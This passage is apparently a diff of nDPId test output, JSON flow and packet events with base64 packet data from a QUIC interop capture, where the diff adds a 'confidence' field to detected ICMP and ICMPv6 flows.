JMxnGuFlucbDvkJrbZFiIDRi1zfBizG5xYGqI2LuZiKga47IwNdNLC8VwTruNg1oItufwg14MMC+X8kARERXQPJMtpnlcPMl3ZXZ+eP3TlPgYKElfm8xvSbmiMo\/gyHVDPysxCqGIaONg8hr1XRFRbXCrsQZqBHdR1BEHr2erluZx33TA9nEW4ljFgCY54FmKcPcThHKkex0pfCGVG0rDwn5CMiYlKCqMkq82agukv3RtcLDwavHHxrRJ4GFUlIajj9luP5Su+tOXWCKfvD7RL2peHKYq0oE1i9rkQ3J+6rPx1pfTLMCYUSGyR2ULLEVyAXotaIxy15QIlAlmWMZrgC+hXiaIxq+hUyINFVkc4FAkBBRAU3EDU5yTv1VQUZR++HeJPUvDn0Ly7STUB7C9GMGsanejmwI9FYR1azwvEiMPzo62YRjgMbM2H450bCbY\/ihQkhW6vCoJACsZGMust90L1tttL0aGDUuM2ekxmmP2SR2XGKJhksWGNk4Qk8NcSbtQGw4rBlTHKDoA+TNa0noiVD30cGIgXZvR4LzxoKJTHmmdOUfJnlbktOUO+L10wT6chVbloEO7Gl6LmuuY63cBoGIu\/9oxZ1fVnf\/qtqp4c5WdmDqlzryd3pEbe\/IAUHs50fQBLfKzcvYMcdoYWKI2XujLzx99HtpnCDcHHfIGi2GBE7lCFUhpHVx\/3REbGwPNIrR5hVqLd9oAN0IWu46FpJq5LdwUTeovYvLw5NA\/DiXOdXc+4fQx+cmbBq4bCo5iPDOTurjVG+AT6KDA=="}
 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434818,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 01188{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1603816434818,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"ts_msec":1603816434818,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAOvYAABwBN+0SvVT1wKgBgAMDupoAAAAARQAFABYUQAAeERf\/wKgBgBK9VPXVKhFSBOwZ0sAKCgoKCEMxhVUtcFhGAABE0qWeLu1BQPCrvaqmOZLxcjaUsYk9VVde3D76gcDL+4IVysNvEgASSqVVEGYaLPIGcbZ3HxJwj7UTPMN9ktHDGQ7OWCRzA6fqhalBV5YwIQEg3hVGDI6qpqitsVwDd8\/MN70IjnRYlLSnGFiFQz\/+37tcMd3B47Z3XUJqAC2gmAtiiG7FB9bVCqu70\/\/gVbe+y8Aiq8lY3pgapL115bg44IU5ONIr0kPIychpXhB4nGil5WtRlR+PfDZaCteJDe8INKJO7W9rCoQHxbJrdHcgp7qNCAvNvwYE3E7IaJzWzZ\/MoUUAYGiQDU5QZNqlmNLsfw7HRz7KL6RKhXKo6arbCoyf+aekhlzkYvXUC6YXLfcX9b\/uhdcExVVj3t3h3bEjsqfwcBC2sK\/3+ftXoClqu\/uJmzlR\/hQg2UZDVSBch9t4LjNi+WntvWr6v5Vi\/KVQ7U43\/Gm4H1rcanEorBOGJAHhmqtXhOThueWcgpRyjQ5+C\/V2Y42zfQkNRgnvzhVV6TCNj3xIlnBpiCnjYGEauIM5QGTgy7j1eEARKu2SqfuTVUmi6oEn63B+sVeMBPtI+6+VRIb69rup\/\/2zzUrMqEGl1Ofqu0NMNJUBI++5TMEJqz8PBpY7++PNBvTXVMJHf\/6eUtUbUHVIf6h+Omvu2jYTq0R6BWM="}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434818,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.556211}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434818,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.556211}
 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1603816434820,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434820,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApCNAAEARDmLAqAGAjOM0XK5LEVEE7GREwQoKCgoIlk3\/sw8\/b8wAAETS7HTMpNcxINQW3ZN+iCGS1z1IAElwdp\/JkpB1113BzMoCCRTe4FQcqzRNlPfFUuL337y9c\/m0xOQ2BSNabPaJGHp30QAKNdTWLRiE0u0lhDN37WkJ3a18g080qiPj3NOKBzBb6Q2R2eP+Tu5VAgK0JBnSSQxscnBGZYx8erjfdk\/KfB+k80tJ23vgNCBrw5\/QJHyIKFr6T5gcmaoduB6MP68CbMsVTh+UudjvNuCb47BBuKD37H0qZ3vrzszhEdCnaBPaTgDC+BRg\/7zjd8y+\/IMXoc4lcJ6yCEUNd5PMsCArc8JfRjxmtTjKsNnWLKbOCz7De91KYHmwGYzaF+m0hYb600XnI1+GfBH+Yt7Rmih6ZJFb61s4n\/p947s86kVOIDjkRzXFc5rj\/5TsZlNwMgHK1trFOYKfIQD\/nGNPAy3b1yszE1t6bon4A+5+sfdvgO3Pb0vQv7a2RjiEoNWsOgLHHYRaOns5wLvhGDh7p2oiwYoA0dOQULiPA3oPFIYn3l5BexqjNtcP9rDwal7aPEC5NULq7Zmi8SqPrNQKrHxduW\/ejURdhLL6oGYtylwTjf6fFdLzV74euKvQMJtzqOmUVsGs7ytHwIW0zUSVdcXZXNdfHTIBhQmt1LEXywwM9sEku5ONFT5vw3iqnJaeuQ3Z9RVWM6JVZBIIyhtRHSHLMWoMYyVHbzNHU6KHtgRqx4XiFpODAS4ZKLu+YaxH\/jgJPdH9GCKqWFOo09L\/MFa9JOyzZTBHgPL9\/n6dV\/AjYlz2WHUbgl4B47TvtoGesKFiqCifWwa9T\/QAs6VqSsxDxakmj9BwRcyJY9Fh+S0GJgfOD3vdFv7r+qe3nnZPXIMdHvVuagTE0AYBONNrKgYdX4Ky4qhLEEd5cE9ERtsD2WvjOGP2X1nIyl6Z5fwtC4lFzD4HiYxcWYOwEoRb4XOLMLjHU1VRqf56Q7VOoNVljrqpfUTD3\/kymwOaOw9lLI9P78KYSDd0ItN84RFi9m1ZATEA4B8xDEQ0xgm7gZL75Bj+DcL6tIj3M5q5t+D3grLTkPWXTTA36Ac5nJ553GrmMeyNqRY+oz7\/jmpae2pHhn5y5a\/JNHh99ySrjiURwgTDidnXFv\/avhfUTEIKYf9vmF1mBR2BjGIWblU\/xSsHPpQooMBCE1pv+edhptbedN01raww3dKDhm8PKg0\/39zcyjrIDUoGuCyt7fcWYxL1rSfHDWFvTo3rOPuLREGMhWKH0rTw1rfsvP7pj9wRWFuq+5bjg1YEYzOa+4ow\/G36iMyOEYXSETkFxk1k9PKRQcdv+hmZ7Yysh6jGqSQYubSckYOn7rzqjXzTbZJ4cVerQWc6vzgu\/f8kKoOJaHeHCNS3S8Ih7LoFy\/3HhVH9BOwbPs1b8AjTnrabB9wJd2L4xt25UkVcDS6dONKmrmw3h\/i2PdMTiY3wE4W1wVKTbunysVPKp2ppBpsra6Hdm1iIJV6HfCSSXwO8AyqeAGhx5QFqNqN2LYiejuoyXFW2FmijSjtLOK+Ec8dkYkpgamnxA4iCyf\/yyvNIxQuF3Qi\/hZNj\/3Ane7tlBEi6cG9xsu3lWfzaAh0Qz\/MZBLCWHCiMGpcbinSxoJxeieJR4hwsH6aIGBBARlcM87JIeY9evAugxQ=="}
 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1603816434821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434821,"pkt":"pJGxgjQ5PKn0qB\/sht1gDnzNBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPtKIBuwTYf3DECgoKCgiO5tu+VRPaUgAARL4uI1WmPGK3DVcwUtE9UzI\/fGSOKvWUIfYmoO3D6w75gyG6cAgBjzUk1WiaTNGr26SzX\/zj3x5ZOIMX2zmIddjoIJovY\/VksJrC3pfUCteiUGgedji71vrrn0fRMQEFiIkPaa+o8LGRwzZKy8VL3G9cV5Q0+xLvukUHxPfTXr+qeeoAkO2JrC0axiSb2dt+XmaJ0v8nr3ud+va3668mZsfa5EeFafHaj8m49xF7nuzVpSiWax1aZSZzIz6eskzoc+1ob4msOELhchJT5jSTUaY4j8tszC8K1inc5HuVJQLo8TDvFonmdmM0XKQKaWAqfBpL0CUAHrxZaa7bFxHWCI+KCUFVNkIiEsJLT7NG1KiOxkI4gvAPMqLHQoSqFHaylCrhyi1kFotT2StbIZXec2UmPZu2coK0kaliS7gU+LJp4Q8aOd\/VQfT+XwTsJ91oSb1hOc3RVgo0quwGh5ZyNdKZAdfV8mq\/WMkDj4BcFPubTYXGgusxS\/MyTqzT1EFGuLIWfyAbYZyodoA4VbTOGXJwfjifkHUQ+UF72jq+Pt7WCCIYrTBJQnTBEUt2MXfl7vDq69U1d9nIXWmxmxitkWebhf3a424eVpSg7vx40Hu84MnwnUTI47yC+ao94ZGXsWQUy81CB15Bxl9YeNY2dJgyiP+5AD9Mhxzqup58xGvvgfzwiN+8b9hNWQCIXG3bcsVJVlFTJ+jyJ9stfjENb7psSrJSchNgxcdmCDy8kzTYUD7r2Kyu23la\/A94iZaAc3a3efSo5IpoqV3d1rp5ZAXMrr7FuDpbBbwpjWOv21FHy9XJpndYMkbIqf\/7foTiABMd4OD5ZERwg0xFUm2\/h9OWCHJH83WAL\/V5NLmuNQVhvxqDt4v9kRbwpq1I6YlY65WMno6Jktn5XADL\/7yB9qcTbstxiHDTP9HA52vwZywCZsUeMNyVpwbs6++IutqZF2u1m5rA1TU892YkmC4kF\/6hNawh4kh9uCP\/dmrEgG3fl\/J1TK58qG0QytYAfCJ0cQ5JLCxfl\/NL8mZSVRO1SYiuLHK3ygtYTMGI6vHbmzBIw7efY9+H20\/n9OdFhPZypP\/u3dYpp4p\/C2O0s6ViK29wOFT+K2UH57w75L7qCQIQY8Jmg4QscecIv0AWmnfsG6wos8x03+j\/JR8bgGEsH1SV8kBWJgmpv\/L4R9h36Dkk7I7wbtNl01psL0lyiPNL+Ovmtqzx+\/3Q62hpJ76z0PUEL8rN8W\/mbea\/y56YejegoW0NiHWhNlluWfwxxnN42q0YVuXvbq45KHAswsaiAvSLHS1\/Hfet1IEJQbT92EAZjtTIJs1ukk6S8C7JBdY2mP1nien9nfYAxxwA\/H5mWvSq0j8RX\/AxShyK\/7L5A8yyjy03hGEmr9rECJ4SlYdMS5IlK68iFiJ4CMvIJ+6AyWXezGevi+5ey4ofkQCxFpY1W0uO7lu7+1aV90Ifn3KxnAwNm6+ry4yHqk6IaT4+FTyUTD70bZ5KtnE5J0z9NnVQAnXfMQNLWwACkQ3k4t1jyk2PI9+I4B+PL+e\/IT7Vzp7naSY2nO4exFruJXfEn4uVZmLymCx9K0eX21XvezrLYl21gesFXXXoMBP7pIhtLQ=="}
 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1603816434822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1603816434822,"pkt":"PKn0qB\/spJGxgjQ5ht1gCEs0ACMR8CoF0BgM6YEAzSri\/bO+xasgAQsHCsnVrqTT\/kdpHoB9EVKuPQAj8mT+AAAAAAAIITUj3tZzyB\/\/AAAd\/wAAHP8AABs="}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1603816434822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":113,"pkt_l4_len":59,"ts_msec":1603816434822,"pkt":"PKn0qB\/spJGxgjQ5ht1gAGSQADsRMCYAHxgjENIwUQN9nn11N08gAQsHCsnVrqTT\/kdpHoB9EVGV+gA7uJfFAAAAAAAIQysxrQYDr8z\/AAAg\/wAAH\/8AAB3\/AAAe\/wAAHP8AABtQQ1ExUENRMDpa+to="}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434822,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1603816434822,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434822,"pkt":"PKn0qB\/spJGxgjQ5ht1gAFucBNg6MyYEqIAIAAChAAAAABJ5MAEgAQsHCsnVrqTT\/kdpHoB9AQQ1AwAAAABgCGnqBNgRMiABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTAB2wkBuwTYmHTJCgoKCggVxSlYpn4UkgAARL5ZLsODdf27vLuu6GHs9eSXiVxIAlfs7TcHZcazXn4JE3\/P5JDqe+tOVWQWmWJiN1Zi+QMXxBMeLDuq2FFgXlL2mFN2Y0Hpqzt32q0IcYNEtodCx0cCDcymndGz22NucmhqDhsBTfQYSZ0TGfZ0Y1dj7OIdkztU4UKtQk0Knbx0pPfOb04IoU66JRugmLaY3NcS6\/YWs3i+G\/Z1NaiZhF7wHXHAr7RtRzKLb2gPHbqV9JkwnbYNdieDzqo6OGYxfFJAF9UdpTyC5RofrFHDOiAzzOkMjstRpfIx0da81MZNBFjRQx8VBZVl5cb5VmHHCRKqUJJ\/pimnlqr6\/rH78B0tJyJdMLcbA0k\/GEaMgb2r9k+khrfN+IYPTP9LEK9IyC61PSNuLM7lCBCfjRBxaONHiGk0HUucFiwpQMj72lTAGTUsQa8qFngN+9r0I8HgvmsmOXC4IyatQFicI6JIBY\/\/xLWv+tugw\/qAeO1niZ+nJFTAbwyvKydJ4CrRCQplld36lx1IDKeajrlxvSY4TO7ZlmYtBTR\/QIZQ1n0y7WxFPForSvTZ5LmkvmQy\/XOIdCHzDT+yu3OG+dlOa05oJSJ5squ1DJvlYS4iSqaRgDu8O1f9s7zQOTQDTlP6inO815rKmw1YpQze+QAPS9Ar8Eh6loMYvm597mpGIaaCjBGmRjM30Y3EWQUMoVmSMYlr+ndlJs0\/parg\/PrflXFNfkn\/Wllw4cvS+JLWNhoBBJwDWpM9YkqIgN6sP6Sf1ACXsEwIhZbB5T3Y+mzlz1fEroyxtSisqFOFlOCB2g0djczdb72gMhUvdB4kROfNLNOm8f4hG1ZnJraoSrQJwgrY+zsLAidSwY62GHtAM9fUNITWGPk7OLfW3OjEbL6sh7ywY+xM+yu0nYlxg0Z8ST6zlbK88Dw9rVrViSQ3Oke1RR\/RShjWSOBcuUxTcA\/eXi5dEcOdrVm6ZsDQ0chPleXisZB4yI9mZgj+jwkM4eFcO6OX8YpKRHpSZrb0SkaAHjgOICK+1d\/ehnzz7M0KNYGDy8XZ08SS3gXJzSNXZLonqI\/bweWJiS+9rlVrB5J5IwRHJDEVN2aAZJbdqAdmcFPCL7XDwYisg0GfcM\/dL5C5xxZS6hZbPHwzwJ6y7r6\/T+A0XWV92UuetwR0QSUywswmbazFGMC\/MBz94jyq\/TrHbvq8OgHad29+CNuQfDZZomN6lJoFhgu1iOIbRwea4vmYiVysTLFxxLhym6vQpFJXvihZGX2xoV1bucff9DyhT5\/Wm8sYVpYS8i2GcM3jWfruzg6rk0SVDY6hf8HFcXkvUJGnDN4KwlwULBiTr9COS06u3di2jUKJqL6FFXM1FtZVzdRf3O\/3GNXJ2HDuA4IlWQXWMcKwj7HbOKOWlf39BkQPYBB\/3CwqDH5TkC7Ny98BmDT6ZzxJIZcSDCUoAZ3M1Es1K7QjuPUiIJlOZZ8vmraAuL1z0zGli+qvbM5O\/6zJbeqSM2M0z0mrGA7v66IfdcHwb0k8mj2tM2aIyHApEXwJPFbWKxWcFb4yW1jdVDOO0Q=="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434822,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434822,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1603816434831,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434831,"pkt":"PKn0qB\/spJGxgjQ5ht1gDK7JBNg6MyABGfAABAA0AAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9AQRVHgAAAABgDJNoBNgRMiABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABqn0BuwTYttHMCgoKCgiHmjxz9S5+NQAARL60MndZKQNzXHuWbuWII8yYjx1QNcGEa3n\/tA\/kZwZdo0+NMbEhrCvw4fqUesktNwPhDHylUS4gcbEvHHb8Knr61qY95Pm5VKwq10YKtyHKrPUvOt6FFf4EaXlhbjCjP5PNGMuBPWvET6CR\/DNJ3amwoZ8AEiUkCCce2IA0+qLjflDvOu19oZVQSJhyk0ID2QUVFxDX+RIo\/BCEiyqGwrxxtUHNgSlpQhvXLPkd7gs0O8q\/1O3MXjjXw3VV1HTEIvgh9CIZHImqbItBAkHFYhj85297ojhzntlLLEMQUeWyYcLZaQRQLAnNxNHIfLFBwCs6Cttccxk8XUgObPlTQVTnnGvEYXJadvbFnkb5nj0E7bmqr23E\/kns4IXbYRFlEjJZfAc6UWDdSOXBoZHXMIAY\/dztkylxbqayCWGkn8v3wQJvR2xFoTyKE+Pp5saXn2uSt4EYi00Uf6fCGbypDRgDr6HED25efO5iFC99NJvuET7V90ObiIxoji+jOYwIL0BCHSm+uFeO8i7r3GmYR0Qg2iAiX6ZmlOl5gmCd40kAXe9Lo\/pKr3+r853YnPdtRNoIckFL+PsGubjlWj714eDNDRnoSoHs8UNwnNN8sF12pzQsAVr7qLBt4e8KWXFMXfkfIKWSnJhvivGIVrhMeN4RiaQ\/jippacCl0CUjlR9AUDC7DyDOswJ0+eP9X+z1Kkt7EaP13RXwGDeKbPLk\/tVc3ZXQShkobo74qelkPT7nbFmTZB78n2grmfmy0C6HMQ+qUHKH\/MfqCCK2ZnmHVM8veaHwzWHFJ4gVd2h5wLXlBRQqCB2AZzoyKpcMZFNpfGh+rTCIwQTyVZzycWPvtrbHzPNg+tUe1i\/foBt0+XApuoCCwHOsgf9nS7IFS3h97hfCh2TYTKBM6t9C3VPFYDuKYfUjriuP3G2Eq7sMAiqBDef1fYGxLN\/Dys1ZS2B2n+Zqt6K1diQtrzsIwKlRRg+XjfSSzPOVrKeXYenyNePWIMOs4YVAyvkFPV4RM\/osDQvZvShUA0iRuuMPCsj024c7WYx9lDihj4EJBymWsIkTQg0x6rfvVrFojeVlS8zgiytvfAIJsOr+k34t3NbLaK0YyfFcVKBnFDiEC5OcAMd0yi6ouvtE9rJyb\/CiH+Vtx9OSGkbowLLyCHtZ1EUgA0\/vr\/mU+ea4hE\/dLdDDjWwxrJg1oKjnYeHQvIDUT0MVaXTlMXS7\/F6HA7\/5QTayU5MU3hKtpwhACAx5gHHhue3iTscqXigKQ7oiaLOdxRIJ2wKmzNzvQPCG5UmOLnsbM\/3lI+SzzLjMM5HxKsnb7yJmS6z2+tdEoxPOa5ZNm7Wc1LoGgLZd+x+V88MeQDFaBDMQHNWCS8z7Ruv7Q8Jc\/JKShee1avRiWD+QjKfpjPULJzGhq8IhO+3xUZoq\/xSnX5PQ7xqYQY3oim9xsL+ADJPPe0oE2O\/lbNfbGhouInwUUVqUmdk\/fion2o\/ylxCHaGoB6j8tJgJq8ystdV8ErJCcEhkKohD7qeUu1YL\/exHAdFqCo5yGAJyVZFmJD6CkMA=="}
 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1603816434836,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434836,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAiNlAAEARQ6DAqAGAyu7cXIm\/EVIE7N5MyAoKCgoIV4qr8UTBK3QAAETSZYQqq5\/hhyGtCz3Zmoi9jrKsnf3wjCZq1mxPTTEfXwdslpFlNBBYDqBuOo+QKDkWn4ZFD\/5qQ8sD8A+lBYGJV+nw5hbll6er2441gO5dAvGVUTjoFTcs61bhJdzOUrux599yFBfTAFDZKYhyBebkHPNDrNvPvVpxfBpxhEGHEq59jbH7Kx56FJtjtSZa9HQG\/OGEFc4JVYBfZDPBXIhzLUdX2JND3qWMQuwP2Xy5LdfjKHYwwsqNQgrtYOT1t6v+Zvqju\/oAictN1dRCuNXP91Pwy5MQysbtofZHqB7e2yb+jFxm4ZMqy+00qpKT7ne5IWIOVRZxjqMikenSsN73RG+rLd\/uLSPXcSlufRT\/qpMuPbNQ6s7DEcokvc85KmowVE9PiWIPrZuSb0oRHuoTyejJTscJK3si7Et7GQNCLhwsIS2k6fsRMPFVceoIZZfXs2PzKq3\/O9EH2D79eeGzP8A5iwmMT7Aab8l3\/6R8LVM6+3PQfPi4jLK+XHWMQbg41\/J9uEQZI5HuTWWQzwcn9UAcG0g4gwcOPmZDzviupQ5tg+\/9eADTReJpa4xS3oYZdywwA3VZsNHvhQf4dL7aplXzKSWQO9B68xf5V1q4gM+CvIJUrE82UCwH8VaOoe1AoHNWtyDW0Ap5d2vSy04x+4EyhLNBj26v3fhqsQcn6Z6a4KwdLKikQaoiVxarNgN+CFr1yDWsPRCqJMe40bhwuS4sWkiGWh8Cv9gLXeNDdRPqaqgBh82GLE7iFA\/U5vdRjLNfTPPFimOZbexduSJLGwwVJejCCwbDdk7Vba1zDnWr6vIMpidFE15bqu1CaUX4wOlMw+UlJ\/Rck\/7v\/g8MgCArdyT52lbEFkxfiUbz9r7dzxe9yAYfnvExfNJocGmNo8cp9UGEZb+Z+fpXkVwNrnTpe82QFjYekWIeghnThVtpzRW6HVEFowML2gXzrgBYWnXVabb+z8NJa9KhgDfRxGY6Qmo7vTY41l2P1aqPcxNOTuIr8rCBIdn5egFmlP6+j3I3zePWc7fsh+HpzbSu2qNxOPfDHrqGgaMf65DyMBQwQD\/2tXTWsn7Vrz+vyWwxpeVt4t+pbwKmIHhkkdrbIJF9mTZzSgQFhOrxmOkT\/t3tmzM4BHRcRs6UQmLnryAbmkEWPDFwWiKG5ro9OVh\/yjexJN4pRIEK9lXHUYCFUgWFM5ofQyZB+jTZyWZLMauwYFWJOs0N1nGD9gUKucMB7p6NqaNEaiwlEG2gf0v2FH9hCslV4oko7fHx3ROpToSYQVimVoCtR9PaGonSHaeqACfo9ua\/Zgtv4cLK6ZiV6DBCf0hDnXZRBh+AaUTWPTe3zcHlDnUHvaFFceiOwKcHKvhC9KWiF3Ddru0uKWSUsFip88BcKpuEabKb0ahOEuMl5XsFJ1\/uDvSVIy33izzMs6n7C\/k4CysougNKX7DiugyzF6BQFi\/VUl9waPfDhomR8hH1euFy1YjY4M2JXUuQh5HV1TzlO4okmnDSo4ios5+eDuKBV4YUuJtBgKFC+X0w\/PUhCXpFy4X3vOqtG4h5S8jL30h+8K84dZjAHTEkJGOvPZIghuHCBB\/bpEvq6Mbt2MCtL\/lIRUUPwjkSauaRIiWSBq1YTOD6X9dULjF3V\/Ewiw=="}
 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1603816434845,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434845,"pkt":"PKn0qB\/spJGxgjQ5ht1gCSIhBNg6MSABGfAABQwhVAAB\/\/4zO5YgAQsHCsnVrqTT\/kdpHoB9AQTZbQAAAABgAfkDBNgRMiABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWlyERUgTYFmvNCgoKCgjw7KzpNo8oeAAARL4tqmRQ5KPAPbdPUnedDn077kKWSLkPygVEwdGpIVFWcp2en9F3ERED+OnUg3d8i8AAkr44lz5aAq3LC+Q212cavhgupcuDcqNoIGhnCIfm+QSZcdNZ4zXfagNI0pLJoRsvOsL\/uXGYxbmgqR94yTDxQ0eUCVIZASIUeRZjEvJCthWVFT2rgBlBR7LYtLcvCmtn0DIMTAiPE\/xh01OGF5bAJQ2pznCPuONfdxbRDf26\/K7Vorl6tUQm\/NY5ROm8iHLzI4aMVUF0HjSu3+YUC1uhFUVddfTvpusRwaZ7kJNAa7P\/Vy96rw+N1QmHoKrViF3SiU98y7yZQbZlWxDFuBm3kfHuLnWeUnH4lwkgdmjgDw\/tGYT9JNO+a4WXT0WG+E149U5CDNgHVyClW14kVzq2L5mwgYWZMAo+lEamoeJB5h9+NMm0nQlLQivIZYDxop0vohOxK5n93lmaDplwC7Jat5ImroXJjGBA1i\/wWMXgstJIth+GejqRDCbbbeG7NxvZ9rVNx+l6f970K8CtZlugC3GRbFE9tMsDJl5zdBgPz83kXeLW4WfxGljbZ2I1\/Fsv5Dj9XTubdhAYt4ThM0knFSb5aX6Ff26rVq4Lfqy9HtKxEerRRn\/GPQ4yjlBfNoPdWIbjRC7TEbcUSnLf\/aCaXXZvuxf7r562GmcMeGxyHBQBVeTMDY1abEs7sWm\/+SOMgor